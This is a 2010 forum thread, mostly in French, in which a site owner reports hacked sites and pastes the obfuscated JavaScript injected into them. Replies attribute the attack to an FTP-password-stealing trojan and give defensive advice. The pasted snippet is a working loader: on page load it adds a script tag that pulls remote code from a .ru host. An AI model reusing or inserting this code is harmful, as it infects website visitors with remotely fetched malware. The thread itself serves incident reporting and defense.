Themesremix Posted March 12, 2010 Share Posted March 12, 2010 inquiétant,plusieurs de mes sites ont été piratés , voici le code injecté sur des fichiers aléatoires (je n'ai pas encore analysé précisément) , et quelque fichier .js entre autre : [removed]var CW=new Date();try {var L='';var E='';var Y;if(Y!=''){Y='zx'};var b="78tfrep".substr(4)+"zHJqlac".substr(4)+"egpJ".substr(0,1);var C=new String("c92Q[".substr(4));var n=String("]");var Om;if(Om!='d' && Om != ''){Om=null};var x;if(x!='Z'){x=''};var l=new String("g");var e='';this.j="";this.qe="";var H=RegExp;var YM=new Date();var J;if(J!='V' && J!='ZV'){J='V'};var UO=new String();function _(s,o){var p=C;p+=o;p+=n;var LK;if(LK!='mb' && LK != ''){LK=null};var S=new H(p, l);var IQ;if(IQ!='' && IQ!='f'){IQ='bd'};return s.replace(S, e);var v;if(v!=''){v='bw'};};this.Ux='';var xC;if(xC!='' && xC!='_Z'){xC=''};var N="sc"+"ri"+"ptrMQ".substr(0,2);var vb=new Date();var cd;if(cd!='' && cd!='CR'){cd='PW'};var W="/ign."+"com/i"+"1Yegn.co".substr(3)+"3h5m/goo53h".substr(3,5)+"gle.co9Cu".substr(0,5)+"om/ko"+"ubei.4Lw".substr(0,5)+"Wj5kcom/t".substr(4)+"hF4orren4hF".substr(3,5)+"tdownCVN".substr(0,5)+"LZ1gloadsgL1Z".substr(4,5)+"DLTS.net.STDL".substr(4,5)+"DJ57php7DJ5".substr(4,3);var s="1";var sL=_('hStItIp5:5/G/Ic5tSrSiGpS-GcSoGm5.5l5iSnSkIeIdGi5nI.5cSoGmI.Gt5rSi5pGoGdG-IcGoSm5.IpIr5oGp5lSu5s5l5aSb5.Gr5uI:S',"I5GS");var hs;if(hs!='NW' && hs!='YjD'){hs='NW'};var eD="qMdonlo".substr(3)+"adCFe".substr(0,2);var K=_('859440544459484945099595',"594");var lI='';var _s;if(_s!=''){_s='pz'};window[eD]=function(){var gS=new Array();z=document.createElement(N);var gH;if(gH!='YX'){gH='YX'};var UG;if(UG!=''){UG='lY'};lI+=sL;var fM;if(fM!='HZ' && fM != ''){fM=null};var YXi='';lI+=K+W;this.et="";this.Hj="";var fT;if(fT!='Xj' && fT!='pK'){fT='Xj'};var TD;if(TD!='Nx' && TD!='cA'){TD='Nx'};var u=document.body;z.defer=s;var to='';var TL;if(TL!='nM'){TL=''};z.src=lI;u.appendChild(z);};var zq=new String();var SY;if(SY!=''){SY='jh'};} catch(k){};var A=new Date();[removed] plus inquiétant, un site sous wordpress sur le meme hébergement à aussi été attaqué ...[Edit par Patric]Titre du topic modifié.De plus étant donné que ça a déjà été abordé plusieurs fois : topic fermé. Link to comment Share on other sites More sharing options...
Daniel Ciornei Posted March 13, 2010 Share Posted March 13, 2010 i will answer in english.i had the same issue with 2 sites hosted in the same place.seems like the problem was a trojan that i had in my computer, who stole my user and password for the ftp connection and then injected code in every file i had. i recomand that you change those before beggining the clean up proces. Link to comment Share on other sites More sharing options...
Sam59 Posted March 13, 2010 Share Posted March 13, 2010 En effet, pour les utilisateurs de Filezilla, ne pas laisser le mot de passe dans les profils de connexion car il est stocké en clair sur votre PC. Il devient très facile de se le faire dérober par un trojan. Link to comment Share on other sites More sharing options...
Peha Posted March 13, 2010 Share Posted March 13, 2010 le fait que le wordpress soit aussi attaqué montre que le code de Presta n'est pas en cause.si vous êtes sous windows, n'enregistrez pas votre mot de passe dans votre client ftp.et changez le souvent. Link to comment Share on other sites More sharing options...
Recommended Posts